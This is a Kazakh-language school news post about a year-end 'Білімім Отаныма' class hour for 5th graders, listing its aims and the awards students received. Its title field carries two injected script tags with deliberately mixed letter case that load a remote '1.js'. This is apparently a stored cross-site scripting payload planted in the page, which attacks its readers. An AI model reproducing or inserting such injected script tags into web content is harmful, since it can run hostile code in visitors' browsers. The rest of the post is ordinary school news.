Іс-шара<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.05.2024 Мамыр айының 23.05.24. Астрахан ауылының №1 ЖОББМ» КММ—де 5 сыныпта оқу жылының аяқталуына орай "Білімім Отаныма" атты ашық тәрбие сағаты өткізілді. Мақсаты: Жас ұрпақтың танымдық көзқарасын, ой-өрісін, дүние-танымын кеңейту, іскерлік қасиеттерін дамыту; Логикалық ойлау, сөйлеу қабілеттерін шыңдау, оқушылар бойына ұлттық мәдени құндылықтарды сіңіру. Туған елін, жерін құрметтейтін саналы, ізденімпаз ұрпақ тәрбиелеу. Тәрбие сағатына ата- аналар қатысты. Тәрбие сағаты барысында оқушылар өз жеткен жетістіктерімен, алдына қойған мақсаттарымен бөлісті. Бүгінгі заманда еліміздің атағын аспандатып, құндылығын қорғау үшін біз қолдана алатын тек бір ғана қару бар. Ол – сапалы білім.Адам өз-өзін әрдайым дамытып, үлкен белестерді бағындыру арқылы жетістіктерге жететініне түйінді ой түйді. Үздік оқушыларды мадақтамалармен. Аудандық мәдениет және аудандық жасөспірімдер шығармашылық үйінің іс- шараларына белсене ат салысқан оқушылар диломдармен марапатталды. Сынып жетекшісі: Касымова С. Ш #bilimim_otanyma
Просмотров: 237


Пікір қосу



Деректерді қолтаңбаға қосу